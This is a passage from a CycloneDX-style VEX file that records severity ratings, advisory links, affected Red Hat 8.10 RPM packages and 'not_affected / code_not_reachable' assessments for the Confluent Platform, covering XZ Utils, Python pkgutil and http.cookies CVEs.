          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34743",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        122
      ],
      "description": "XZ Utils provide a general-purpose data-compression library plus command-line tools. Prior to version 5.8.3, if lzma_index_decoder() was used to decode an Index that contained no Records, the resulting lzma_index was left in a state where where a subsequent lzma_index_append() would allocate too little memory, and a buffer overflow would occur. This issue has been patched in version 5.8.3.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34743"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/31/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34743"
        },
        {
          "url": "https://github.com/tukaani-project/xz/commit/c8c22869e780ff57c96b46939c3d79ff99395f87"
        },
        {
          "url": "https://github.com/tukaani-project/xz/releases/tag/v5.8.3"
        },
        {
          "url": "https://github.com/tukaani-project/xz/security/advisories/GHSA-x872-m794-cxhv"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/07/msg00034.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34743"
        },
        {
          "url": "https://tukaani.org/xz/index-append-overflow.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8362-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34743"
        }
      ],
      "published": "2026-04-02T19:21:33+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "5.2.4-4.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3479",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        22
      ],
      "description": "DISPUTED: The project has clarified that the documentation was incorrect, and that pkgutil.get_data() has the same security model as open(). The documentation has been updated to clarify this point. There is no vulnerability in the function if following the intended security model.\n\npkgutil.get_data() did not validate the resource argument as documented, allowing path traversals.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3479"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3479"
        },
        {
          "url": "https://github.com/python/cpython/commit/5af6ce3e7b643a30a02d22245c1e3f4a8bc0a1fe"
        },
        {
          "url": "https://github.com/python/cpython/commit/bcdf231946b1da8bdfbab4c05539bb0cc964a1c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/cf59bf76470f3d75ad47d80ffb8ce76b64b5e943"
        },
        {
          "url": "https://github.com/python/cpython/commit/d786d59a8f7196bb630100a869f28ad13436b59c"
        },
        {
          "url": "https://github.com/python/cpython/issues/146121"
        },
        {
          "url": "https://github.com/python/cpython/pull/146122"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/WYLLVQOOCKGK73JM7Z7ZSNOJC4N7BAWY/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3479"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3479"
        }
      ],
      "published": "2026-03-18T19:16:06+00:00",
      "updated": "2026-06-17T10:43:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3644",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        116
      ],
      "description": "The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update(), |= operator, and unpickling paths were not patched, allowing control characters to bypass input validation. Additionally, BaseCookie.js_output() lacked the output validation applied to BaseCookie.output().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3644"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/3974092b037f9a3b000fb15b48ea61ce3b25d330"
        },
        {
          "url": "https://github.com/python/cpython/commit/556aa098e738b127c714866f819b4abe2f7593d8"
        },
        {
          "url": "https://github.com/python/cpython/commit/57e88c1cf95e1481b94ae57abe1010469d47a6b4"
        },
        {
          "url": "https://github.com/python/cpython/commit/62ceb396fcbe69da1ded3702de586f4072b590dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/d16ecc6c3626f0e2cc8f08c309c83934e8a979dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/dae4b1a21f8df4570e30986affd61bbe4ade4cef"
        },
        {
          "url": "https://github.com/python/cpython/issues/145599"
        },
        {
          "url": "https://github.com/python/cpython/pull/145600"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3644.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/H6CADMBCDRFGWCMOXWUIHFJNV43GABJ7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3644"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3644"
        }
      ],
      "published": "2026-03-16T18:16:09+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
